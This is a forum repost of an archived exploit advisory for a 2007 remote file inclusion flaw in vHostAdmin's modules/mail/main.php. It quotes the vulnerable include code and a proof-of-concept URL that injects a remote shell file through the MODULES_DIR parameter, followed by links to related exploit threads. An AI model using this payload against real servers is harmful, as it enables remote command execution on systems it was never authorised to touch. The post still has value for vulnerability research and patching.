Exploit vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3191
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0558
Дата публикации
2007-01-24
Код: 
               _________________________________
      ________|                                 |________
      \       |         Dr Max Virus            |       /
       \      |                                 |      /
       /      |_________________________________|      \
      /___________)                         (___________\
------------------------------------------------------------------------------------------------------------------------
Script:vHostAdmin
Affected Version:1.0
Risk:Highly Critical
Downlaoad:http://www.inter7.com/vhostadmin/vhostadmin-cvs-1112134662.tar.gz
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (modules/mail/main.php)
Vul Code;
require_once($MODULES_DIR . '/mail/domains.php');
require_once($MODULES_DIR . '/mail/users.php');
require_once($MODULES_DIR . '/mail/forwards.php');
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/modules/mail/main.php?MODULES_DIR=shell.txt?&cmd=0wn3d 
By Dr Max Virus;
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-24]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection
Ответы
0
Просмотры
505
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution
Ответы
0
Просмотры
469
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting
Ответы
0
Просмотры
455
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Fork CMS 3.x - '/backend/modules/error/actions/index.php?parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
457
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
Ответы
0
Просмотры
436
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
428
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PostNuke Modules Factory Subjects Module 2.0 - SQL Injection
Ответы
0
Просмотры
442
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit AneCMS 1.x - '/modules/blog/index.php' SQL Injection
Ответы
0
Просмотры
422
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit AneCMS 1.x - '/modules/blog/index.php' HTML Injection
Ответы
0
Просмотры
419
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition' Cross-Site Scripting
Ответы
0
Просмотры
365
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу